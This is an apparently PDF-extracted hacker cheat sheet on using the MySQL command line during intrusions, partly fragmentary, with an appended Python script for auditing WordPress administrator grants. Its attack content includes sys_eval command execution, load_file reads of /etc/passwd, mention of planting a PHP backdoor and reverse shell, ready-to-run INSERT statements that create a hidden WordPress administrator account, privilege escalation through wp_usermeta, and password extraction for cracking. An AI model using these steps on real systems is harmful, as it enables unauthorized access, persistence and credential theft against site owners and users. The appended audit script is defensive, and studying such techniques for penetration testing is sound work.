Command Line Mysql For Hackers PDF
Learning to connect to a MySQL server via command line is extremely useful in many situations
especially for penetration testing. It’s quick, easy to learn and the fastest way to get in.
This command will log you into the MySQL server with user “user” on host address 192.168.0.26.
┌─[✗]─[user@parrot]─[~]
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 4
Server version: 5.7.28-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>
To see what databases are available to the user you’ve logged in with, type the “show” command. To
start viewing information about the database, use the “use” command.
show databases;
use databasename;
Tricks!
# execute commands against mysql
The two most important things you should know are how to see the tables of a database and how to
view the definition.
show tables;
To see information about a table such as a schema use the “describe” command.
describe tablename;
use wp_hacked;
The user is “root” and the password is “plbkac”. Yes, there isn’t a space between “-p” and the
password. That is the way you do it…
Ex-filtrating Data
select sys_eval("whoami");
Reading Data
select load_file("/etc/shells");
select load_file("/etc/passwd");
This will create a PHP backdoor script that will execute commands against the system. You can easily
call home with a reverse shell.
You can create a new user with administrative access very easily using SQL. There are 2 tables and 3
sets of data that must be inserted to accomplish this. If you don’t want to create a new user and have
compromised a low-privileged user, you can use SQL to elevate your privileges by updating the
wp_usermeta table. Adjusting the meta_value for the meta_keys “wp_capabilities” and
“wp_user_level” will elevate access if done correctly.
This script isn’t 100% accurate. WordPress no longer uses MD5 hashes for passwords. There’s a
script that adds a salt in WordPress. You’ll have to reset your password or copy in a known user’s
password.
The key thing about WordPress is understanding how data is saved. Some of the data in WordPress
is saved in composite JSON strings.
a:1:{s:6:"author";b:1;}
You can’t just change “author” to “administrator”. The “s” stands for string and the 6 means it is 6
characters long. You must update the entire JSON string to make this work.
a:1:{s:13:"administrator";s:1:"1";}
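Added example, not part of the original document: the length-prefix rule described above (the format is what PHP's serialize() produces), written as a small Python parser and used to audit wp_capabilities rows for administrator grants and malformed values. The function names and sample rows are constructed for illustration, and flagging a grant that is not stored as b:1 rests on the assumption that WordPress itself writes granted capabilities as booleans.

```python
import re

HEAD = re.compile(rb'a:(\d+):\{')
ITEM = re.compile(rb's:(\d+):"|([bi]):(-?\d+);')

def parse_caps(text):
    """Parse a wp_capabilities value (array of s:/b:/i: items), enforcing length prefixes."""
    data = text.encode()
    m = HEAD.match(data)
    if not m:
        raise ValueError("not a serialized array")
    pos, values = m.end(), []
    for _ in range(2 * int(m.group(1))):      # each entry is a key followed by a value
        m = ITEM.match(data, pos)
        if not m:
            raise ValueError(f"bad item at byte {pos}")
        pos = m.end()
        if m.group(1) is not None:            # string: take exactly the declared byte count
            end = pos + int(m.group(1))
            if data[end:end + 2] != b'";':
                raise ValueError(f"length prefix mismatch at byte {pos}")
            values.append(data[pos:end].decode())
            pos = end + 2
        else:                                 # boolean or integer
            n = int(m.group(3))
            values.append(bool(n) if m.group(2) == b"b" else n)
    if data[pos:] != b"}":
        raise ValueError("trailing or missing data")
    return dict(zip(values[0::2], values[1::2]))

def audit(rows):
    """rows: (user_id, meta_value) pairs taken where meta_key = 'wp_capabilities'."""
    findings = []
    for uid, meta in rows:
        try:
            caps = parse_caps(meta)
        except ValueError:
            findings.append((uid, "malformed"))
            continue
        if "administrator" in caps:
            native = caps["administrator"] is True   # assumption: WordPress writes b:1
            findings.append((uid, "administrator" if native else "administrator, non-boolean grant"))
    return findings

# Constructed sample rows, not data from any real site.
SAMPLE = [(1, 'a:1:{s:13:"administrator";b:1;}'), (5, 'a:1:{s:6:"author";b:1;}'),
          (8, 'a:1:{s:13:"administrator";s:1:"1";}'), (9, 'a:1:{s:6:"administrator";b:1;}')]
if __name__ == "__main__":
    print(audit(SAMPLE))
```

Rows reported as malformed or as a non-boolean grant are the ones to compare against the site's own account-creation records.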
You will need to find the TOP value for the ID. This will not work if the ID already exists.
INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`,
`user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('8', 'gotcha',
MD5('demo'), 'Your Name', 'gotcha@hackaco.com', 'http://www.hackaco.com/',
'2019-11-21 00:00:00', '', '0', 'L33t Haxor');
INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8',
'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');
INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8',
'wp_user_level', '10');
By concatenating the user login and password we can better extract data ready for John the Ripper.